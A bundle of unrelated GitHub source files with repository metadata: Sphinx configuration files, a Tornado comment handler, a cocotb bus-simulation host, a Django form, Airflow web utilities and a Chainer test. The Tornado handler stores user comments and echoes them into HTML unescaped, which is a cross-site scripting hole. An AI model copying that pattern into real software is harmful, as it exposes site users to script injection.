# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
|
{
"content_hash": "67eeb2f43be4b63dd3ce018b593da565",
"timestamp": "",
"source": "github",
"line_count": 276,
"max_line_length": 149,
"avg_line_length": 31.844202898550726,
"alnum_prop": 0.7009898737057686,
"repo_name": "kxxoling/Plim",
"id": "ff9a48eefc5bbc9785a6bdd73ada7f5ed881a82c",
"size": "9204",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/conf.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "106700"
}
],
"symlink_target": ""
}
|
# -*- coding: utf-8 -*-
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# google-cloud-dataform documentation build configuration file
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import shlex
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(".."))
# For plugins that can not read conf.py.
# See also: https://github.com/docascode/sphinx-docfx-yaml/issues/85
sys.path.insert(0, os.path.abspath("."))
__version__ = ""
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = "1.5.5"
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.intersphinx",
"sphinx.ext.coverage",
"sphinx.ext.doctest",
"sphinx.ext.napoleon",
"sphinx.ext.todo",
"sphinx.ext.viewcode",
"recommonmark",
]
# autodoc/autosummary flags
autoclass_content = "both"
autodoc_default_options = {"members": True}
autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = [".rst", ".md"]
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The root toctree document.
root_doc = "index"
# General information about the project.
project = "google-cloud-dataform"
copyright = "2019, Google"
author = "Google APIs"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
release = __version__
# The short X.Y version.
version = ".".join(release.split(".")[0:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = [
"_build",
"**/.nox/**/*",
"samples/AUTHORING_GUIDE.md",
"samples/CONTRIBUTING.md",
"samples/snippets/README.rst",
]
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "alabaster"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
"description": "Google Cloud Client Libraries for google-cloud-dataform",
"github_user": "googleapis",
"github_repo": "python-dataform",
"github_banner": True,
"font_family": "'Roboto', Georgia, sans",
"head_font_family": "'Roboto', Georgia, serif",
"code_font_family": "'Roboto Mono', 'Consolas', monospace",
}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = "google-cloud-dataform-doc"
# -- Options for warnings ------------------------------------------------------
suppress_warnings = [
# Temporarily suppress this to avoid "more than one target found for
# cross-reference" warning, which are intractable for us to avoid while in
# a mono-repo.
# See https://github.com/sphinx-doc/sphinx/blob
# /2a65ffeef5c107c19084fabdd706cdff3f52d93c/sphinx/domains/python.py#L843
"ref.python"
]
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
root_doc,
"google-cloud-dataform.tex",
"google-cloud-dataform Documentation",
author,
"manual",
)
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(
root_doc,
"google-cloud-dataform",
"google-cloud-dataform Documentation",
[author],
1,
)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
root_doc,
"google-cloud-dataform",
"google-cloud-dataform Documentation",
author,
"google-cloud-dataform",
"google-cloud-dataform Library",
"APIs",
)
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
"python": ("https://python.readthedocs.org/en/latest/", None),
"google-auth": ("https://googleapis.dev/python/google-auth/latest/", None),
"google.api_core": (
"https://googleapis.dev/python/google-api-core/latest/",
None,
),
"grpc": ("https://grpc.github.io/grpc/python/", None),
"proto-plus": ("https://proto-plus-python.readthedocs.io/en/latest/", None),
"protobuf": ("https://googleapis.dev/python/protobuf/latest/", None),
}
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
|
{
"content_hash": "039309f3f8d510fd527228398080776c",
"timestamp": "",
"source": "github",
"line_count": 384,
"max_line_length": 80,
"avg_line_length": 32.325520833333336,
"alnum_prop": 0.6913719487633933,
"repo_name": "googleapis/python-dataform",
"id": "58bb25ca955b3b515f307b5ecee360a0a2c21538",
"size": "12413",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "docs/conf.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2050"
},
{
"name": "Python",
"bytes": "951895"
},
{
"name": "Shell",
"bytes": "30666"
}
],
"symlink_target": ""
}
|
'''
Created on Oct 29, 2015
@author: ev0l
'''
import time
import tornado.gen
from tornado.ioloop import IOLoop
from bson import ObjectId
from handlers import BaseHandler
class AddCommentHandler(BaseHandler):
'''
    Add a comment.
'''
@tornado.gen.coroutine
def post(self):
user = str(self.get_secure_cookie("user"))
pic_id = ObjectId(self.get_argument("id")[1:])
comment = self.get_argument("comment")
db_pic = self.application.db.pic
if comment:
new_comment = {user: comment}
dic = {"comment": new_comment}
try:
yield db_pic.update({'_id': pic_id}, {'$push': dic})
except:
yield db_pic.update({'_id': pic_id}, {'$set': dic})
            # TODO: the delayed animation should be handled by front-end JS
yield tornado.gen.Task(IOLoop.instance().add_timeout, time.time() + 0.5)
result = '<a class="v_a" href="/user/' + user + '">' + \
user + '</a>: <span>' + comment + '</span><br />'
self.write(result)
route = [(r"/addcomment", AddCommentHandler), ]
|
{
"content_hash": "25effcb338930254395b603fe128365b",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 84,
"avg_line_length": 29.56756756756757,
"alnum_prop": 0.5484460694698354,
"repo_name": "evolsnow/tornado-web",
"id": "c91d719c66b755f6a903d01d5f08d8b891c4e1e4",
"size": "1124",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "handlers/add_comment.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3702"
},
{
"name": "HTML",
"bytes": "7391"
},
{
"name": "JavaScript",
"bytes": "3233"
},
{
"name": "Python",
"bytes": "17326"
}
],
"symlink_target": ""
}
|
from array import array as Array
import cocotb
import threading
from cocotb.triggers import Timer
from cocotb.triggers import Join
from cocotb.triggers import RisingEdge
from cocotb.triggers import ReadOnly
from cocotb.triggers import FallingEdge
from cocotb.triggers import ReadWrite
from cocotb.triggers import Event
from cocotb.result import ReturnValue
from cocotb.result import TestFailure
from cocotb.binary import BinaryValue
from cocotb.clock import Clock
from cocotb import bus
import json
import cocotb.monitors
#from nysa.host.nysa import Nysa
from sim.sim import FauxNysa
from nysa.ibuilder.lib.gen_scripts.gen_sdb import GenSDB
from nysa.host.nysa import NysaCommError
from nysa.common.status import Status
CLK_PERIOD = 4
RESET_PERIOD = 20
def create_thread(function, name, dut, args):
    # Run the supplied target function in a background thread and return the thread handle
    new_thread = threading.Thread(group=None,
                                  target=function,
                                  name=name,
                                  args=args,
                                  kwargs={})
    new_thread.start()
    dut.log.warning("Thread Started")
    return new_thread
class NysaSim (FauxNysa):
def __init__(self, dut, period = CLK_PERIOD):
self.status = Status()
self.status.set_level('verbose')
self.comm_lock = cocotb.triggers.Lock('comm')
self.dut = dut
dev_dict = json.load(open('test_dict.json'))
super (NysaSim, self).__init__(dev_dict, self.status)
self.timeout = 1000
self.response = Array('B')
self.dut.rst <= 0
self.dut.ih_reset <= 0
self.dut.in_ready <= 0
self.dut.in_command <= 0
self.dut.in_address <= 0
self.dut.in_data <= 0
self.dut.in_data_count <= 0
gd = GenSDB()
self.rom = gd.gen_rom(self.dev_dict, debug = False)
#yield ClockCycles(self.dut.clk, 10)
cocotb.fork(Clock(dut.clk, period).start())
#self.dut.log.info("Clock Started")
@cocotb.coroutine
def wait_clocks(self, num_clks):
for i in range(num_clks):
yield RisingEdge(self.dut.clk)
def read_sdb(self):
"""read_sdb
Read the contents of the DRT
Args:
Nothing
Returns (Array of bytes):
the raw DRT data, this can be ignored for normal operation
Raises:
Nothing
"""
self.s.Verbose("entered")
gd = GenSDB()
self.rom = gd.gen_rom(self.dev_dict, debug = False)
return self.nsm.read_sdb(self)
def read(self, address, length = 1, mem_device = False):
if (address * 4) + (length * 4) <= len(self.rom):
length *= 4
address *= 4
ra = Array('B')
for count in range (0, length, 4):
ra.extend(self.rom[address + count :address + count + 4])
#print "ra: %s" % str(ra)
return ra
self._read(address, length, mem_device)
return self.response
@cocotb.function
def _read(self, address, length = 1, mem_device = False):
yield(self.comm_lock.acquire())
#print "_Read Acquire Lock"
data_index = 0
self.dut.in_ready <= 0
self.dut.out_ready <= 0
self.response = Array('B')
yield( self.wait_clocks(10))
if (mem_device):
self.dut.in_command <= 0x00010002
else:
self.dut.in_command <= 0x00000002
self.dut.in_data_count <= length
self.dut.in_address <= address
self.dut.in_data <= 0
yield( self.wait_clocks(1))
self.dut.in_ready <= 1
yield FallingEdge(self.dut.master_ready)
yield( self.wait_clocks(1))
self.dut.in_ready <= 0
yield( self.wait_clocks(1))
self.dut.out_ready <= 1
while data_index < length:
#self.dut.log.info("Waiting for master to assert out enable")
yield RisingEdge(self.dut.out_en)
yield( self.wait_clocks(1))
self.dut.out_ready <= 0
timeout_count = 0
data_index += 1
value = self.dut.out_data.value.get_value()
self.response.append(0xFF & (value >> 24))
self.response.append(0xFF & (value >> 16))
self.response.append(0xFF & (value >> 8))
self.response.append(0xFF & value)
yield( self.wait_clocks(1))
self.dut.out_ready <= 1
if self.dut.master_ready.value.get_value() == 0:
yield RisingEdge(self.dut.master_ready)
yield( self.wait_clocks(10))
self.comm_lock.release()
raise ReturnValue(self.response)
@cocotb.function
def write(self, address, data = None, mem_device = False):
yield(self.comm_lock.acquire())
# print "Write Acquired Lock"
data_count = len(data) / 4
#print "data count: %d" % data_count
yield( self.wait_clocks(1))
if data_count == 0:
raise NysaCommError("Length of data to write is 0!")
data_index = 0
timeout_count = 0
#self.dut.log.info("Writing data")
self.dut.in_address <= address
if (mem_device):
self.dut.in_command <= 0x00010001
else:
self.dut.in_command <= 0x00000001
self.dut.in_data_count <= data_count
while data_index < data_count:
self.dut.in_data <= (data[data_index ] << 24) | \
(data[data_index + 1] << 16) | \
(data[data_index + 2] << 8 ) | \
(data[data_index + 3] )
self.dut.in_ready <= 1
#self.dut.log.info("Waiting for master to deassert ready")
yield FallingEdge(self.dut.master_ready)
yield( self.wait_clocks(1))
data_index += 1
timeout_count = 0
#self.dut.log.info("Waiting for master to be ready")
self.dut.in_ready <= 0
yield RisingEdge(self.dut.master_ready)
yield( self.wait_clocks(1))
self.response = Array('B')
value = self.dut.out_data.value.get_value()
self.response.append(0xFF & (value >> 24))
self.response.append(0xFF & (value >> 16))
self.response.append(0xFF & (value >> 8))
self.response.append(0xFF & value)
yield( self.wait_clocks(10))
self.comm_lock.release()
@cocotb.coroutine
def wait_for_interrupts(self, wait_time = 1):
pass
@cocotb.coroutine
def dump_core(self):
pass
@cocotb.coroutine
def reset(self):
yield(self.comm_lock.acquire())
#print "Reset Acquired Lock"
yield(self.wait_clocks(RESET_PERIOD / 2))
self.dut.rst <= 1
#self.dut.log.info("Sending Reset to the bus")
self.dut.in_ready <= 0
self.dut.out_ready <= 0
self.dut.in_command <= 0
self.dut.in_address <= 0
self.dut.in_data <= 0
self.dut.in_data_count <= 0
yield(self.wait_clocks(RESET_PERIOD / 2))
self.dut.rst <= 0
yield(self.wait_clocks(RESET_PERIOD / 2))
yield( self.wait_clocks(10))
self.comm_lock.release()
#print "Reset Release Lock"
@cocotb.coroutine
def ping(self):
timeout_count = 0
while timeout_count < self.timeout:
yield RisingEdge(self.dut.clk)
timeout_count += 1
yield ReadOnly()
            if self.dut.master_ready.value.get_value() == 0:
continue
else:
break
if timeout_count == self.timeout:
self.dut.log.error("Timed out while waiting for master to be ready")
return
yield ReadWrite()
self.dut.in_ready <= 1
self.dut.in_command <= 0
self.dut.in_data <= 0
self.dut.in_address <= 0
self.dut.in_data_count <= 0
self.dut.out_ready <= 1
timeout_count = 0
while timeout_count < self.timeout:
yield RisingEdge(self.dut.clk)
timeout_count += 1
yield ReadOnly()
if self.dut.out_en.value.get_value() == 0:
continue
else:
break
if timeout_count == self.timeout:
self.dut.log.error("Timed out while waiting for master to respond")
return
self.dut.in_ready <= 0
self.dut.log.info("Master Responded to ping")
self.dut.log.info("\t0x%08X" % self.out_status.value.get_value())
def register_interrupt_callback(self, index, callback):
pass
def unregister_interrupt_callback(self, index, callback = None):
pass
def get_sdb_base_address(self):
return 0x0
def get_board_name(self):
return "Cocotb"
def upload(self, filepath):
pass
def program(self):
pass
|
{
"content_hash": "6a41e95c91bb9edbf465ac33529eefff",
"timestamp": "",
"source": "github",
"line_count": 304,
"max_line_length": 81,
"avg_line_length": 31.105263157894736,
"alnum_prop": 0.5272842639593909,
"repo_name": "CospanDesign/nysa-verilog",
"id": "1fdcacca747f4769aecd63776a89ce75e48ad56d",
"size": "10151",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "verilog/wishbone/slave/wb_dma/cocotb/model/sim_host.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Coq",
"bytes": "25571"
},
{
"name": "Makefile",
"bytes": "32642"
},
{
"name": "Python",
"bytes": "539357"
},
{
"name": "Shell",
"bytes": "50"
},
{
"name": "Verilog",
"bytes": "3281026"
}
],
"symlink_target": ""
}
|
from django import forms
from django.contrib.auth import get_user_model
from django.utils.translation import ugettext_lazy as _
class UserChangeForm(forms.ModelForm):
"""
Edit profile example form for registered users.
"""
first_name = forms.CharField(label=_('First name'), max_length=75)
last_name = forms.CharField(label=_('Last name'), max_length=75)
class Meta:
model = get_user_model()
fields = (
'first_name',
'last_name',
'email',
'description',
)
def clean_first_name(self):
val = self.cleaned_data['first_name'].strip()
if not len(val) > 0:
raise forms.ValidationError(_('Text cannot be empty.'))
return val
def clean_last_name(self):
val = self.cleaned_data['last_name'].strip()
if not len(val) > 0:
raise forms.ValidationError(_('Text cannot be empty.'))
return val
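# Hedged usage sketch (field values and the request object are illustrative):
#
#   form = UserChangeForm(data={'first_name': 'Ada', 'last_name': 'Lovelace',
#                               'email': 'ada@example.com', 'description': ''},
#                         instance=request.user)
#   if form.is_valid():
#       form.save()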
|
{
"content_hash": "90c1c1079d872f4c22eb909b4909c438",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 70,
"avg_line_length": 26.054054054054053,
"alnum_prop": 0.5892116182572614,
"repo_name": "funkbit/django-funky-user",
"id": "491236449d195a1b4aa300e742208ed8d982e917",
"size": "964",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/testapp/forms.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "27711"
}
],
"symlink_target": ""
}
|
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import object
from cgi import escape
from io import BytesIO as IO
import gzip
import functools
from flask import after_this_request, request
from flask.ext.login import current_user
import wtforms
from wtforms.compat import text_type
from airflow import configuration
from airflow import login, models, settings
AUTHENTICATE = configuration.getboolean('webserver', 'AUTHENTICATE')
class LoginMixin(object):
def is_accessible(self):
return (
not AUTHENTICATE or (
not current_user.is_anonymous() and
current_user.is_authenticated()
)
)
class SuperUserMixin(object):
def is_accessible(self):
return (
not AUTHENTICATE or
(not current_user.is_anonymous() and current_user.is_superuser())
)
class DataProfilingMixin(object):
def is_accessible(self):
return (
not AUTHENTICATE or
(not current_user.is_anonymous() and current_user.data_profiling())
)
def limit_sql(sql, limit, conn_type):
sql = sql.strip()
sql = sql.rstrip(';')
if sql.lower().startswith("select"):
if conn_type in ['mssql']:
sql = """\
SELECT TOP {limit} * FROM (
{sql}
) qry
""".format(**locals())
elif conn_type in ['oracle']:
sql = """\
SELECT * FROM (
{sql}
) qry
WHERE ROWNUM <= {limit}
""".format(**locals())
else:
sql = """\
SELECT * FROM (
{sql}
) qry
LIMIT {limit}
""".format(**locals())
return sql
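# Hedged example of the wrapping behaviour (table and limit are illustrative):
#   limit_sql("SELECT dag_id FROM dag;", 100, "mysql")
# strips the trailing semicolon and returns the query wrapped in a subquery ending
# in "LIMIT 100"; "mssql" uses a SELECT TOP wrapper and "oracle" a ROWNUM filter instead.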
def action_logging(f):
'''
Decorator to log user actions
'''
@functools.wraps(f)
def wrapper(*args, **kwargs):
session = settings.Session()
if current_user and hasattr(current_user, 'username'):
user = current_user.username
else:
user = 'anonymous'
session.add(
models.Log(
event=f.__name__,
task_instance=None,
owner=user,
extra=str(request.args.items())))
session.commit()
return f(*args, **kwargs)
return wrapper
def gzipped(f):
'''
Decorator to make a view compressed
'''
@functools.wraps(f)
def view_func(*args, **kwargs):
@after_this_request
def zipper(response):
accept_encoding = request.headers.get('Accept-Encoding', '')
if 'gzip' not in accept_encoding.lower():
return response
response.direct_passthrough = False
if (response.status_code < 200 or
response.status_code >= 300 or
'Content-Encoding' in response.headers):
return response
gzip_buffer = IO()
gzip_file = gzip.GzipFile(mode='wb',
fileobj=gzip_buffer)
gzip_file.write(response.data)
gzip_file.close()
response.data = gzip_buffer.getvalue()
response.headers['Content-Encoding'] = 'gzip'
response.headers['Vary'] = 'Accept-Encoding'
response.headers['Content-Length'] = len(response.data)
return response
return f(*args, **kwargs)
return view_func
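# Hedged usage sketch (the route and view are illustrative):
#
#   @app.route('/big_report')
#   @gzipped
#   def big_report():
#       return render_template('report.html')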
def make_cache_key(*args, **kwargs):
'''
Used by cache to get a unique key per URL
'''
path = request.path
args = str(hash(frozenset(request.args.items())))
return (path + args).encode('ascii', 'ignore')
class AceEditorWidget(wtforms.widgets.TextArea):
"""
Renders an ACE code editor.
"""
def __call__(self, field, **kwargs):
kwargs.setdefault('id', field.id)
html = '''
<div id="{el_id}" style="height:100px;">{contents}</div>
<textarea
id="{el_id}_ace" name="{form_name}"
style="display:none;visibility:hidden;">
</textarea>
'''.format(
el_id=kwargs.get('id', field.id),
contents=escape(text_type(field._value())),
form_name=field.id,
)
return wtforms.widgets.core.HTMLString(html)
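# Hedged usage sketch (the form and field names are illustrative):
#
#   class CodeForm(wtforms.Form):
#       script = wtforms.TextAreaField('script', widget=AceEditorWidget())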
|
{
"content_hash": "8b1179d2bf597da9570f0ab3f3ecf52b",
"timestamp": "",
"source": "github",
"line_count": 161,
"max_line_length": 79,
"avg_line_length": 27.080745341614907,
"alnum_prop": 0.5493119266055045,
"repo_name": "storpipfugl/airflow",
"id": "a796bf525b4d6e5b3cc02e91437aa8378e75aae8",
"size": "4360",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "airflow/www/utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "36119"
},
{
"name": "HTML",
"bytes": "95588"
},
{
"name": "JavaScript",
"bytes": "895747"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "571387"
},
{
"name": "Shell",
"bytes": "5301"
}
],
"symlink_target": ""
}
|
import unittest
import numpy
import six
import chainer
from chainer import cuda
from chainer import functions
from chainer import gradient_check
from chainer import testing
from chainer.testing import attr
from chainer.testing import condition
if cuda.available:
cuda.init()
class TestSoftmax(unittest.TestCase):
def setUp(self):
self.x = numpy.random.uniform(-1, 1, (2, 3)).astype(numpy.float32)
self.gy = numpy.random.uniform(-1, 1, (2, 3)).astype(numpy.float32)
def check_forward(self, x_data, use_cudnn=True):
x = chainer.Variable(x_data)
y = functions.softmax(x, use_cudnn)
self.assertEqual(y.data.dtype, numpy.float32)
y_expect = numpy.exp(self.x)
for i in six.moves.range(y_expect.shape[0]):
y_expect[i] /= y_expect[i].sum()
gradient_check.assert_allclose(y_expect, y.data)
@condition.retry(3)
def test_forward_cpu(self):
self.check_forward(self.x)
@attr.cudnn
@condition.retry(3)
def test_forward_gpu(self):
self.check_forward(cuda.to_gpu(self.x))
@attr.gpu
@condition.retry(3)
    def test_forward_gpu_no_cudnn(self):
self.check_forward(cuda.to_gpu(self.x), False)
def check_backward(self, x_data, gy_data, use_cudnn=True):
x = chainer.Variable(x_data)
y = functions.softmax(x, use_cudnn)
y.grad = gy_data
y.backward()
func = y.creator
f = lambda: func.forward((x.data,))
gx, = gradient_check.numerical_grad(f, (x.data,), (y.grad,), eps=1e-2)
gradient_check.assert_allclose(gx, x.grad)
@condition.retry(3)
def test_backward_cpu(self):
self.check_backward(self.x, self.gy)
@attr.cudnn
@condition.retry(3)
def test_backward_gpu(self):
self.check_backward(cuda.to_gpu(self.x), cuda.to_gpu(self.gy))
@attr.gpu
@condition.retry(3)
def test_backward_gpu_no_cudnn(self):
self.check_backward(cuda.to_gpu(self.x), cuda.to_gpu(self.gy), False)
testing.run_module(__name__, __file__)
|
{
"content_hash": "7c972d7e7481a9a20fb0424c9e1e2b97",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 78,
"avg_line_length": 26.844155844155843,
"alnum_prop": 0.6390904692791485,
"repo_name": "elviswf/chainer",
"id": "b3dc83e0b0131d1c9293a4105fa673271cd9120b",
"size": "2067",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tests/functions_tests/test_softmax.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "582414"
}
],
"symlink_target": ""
}
|
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx']
autodoc_member_order = 'bysource'
intersphinx_mapping = {
'python': ('http://docs.python.org/2.7', None)
}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'csvkit'
copyright = u'2012, Christopher Groskopf'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.6.2'
# The full version, including alpha/beta/rc tags.
release = '0.6.2 (beta)'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
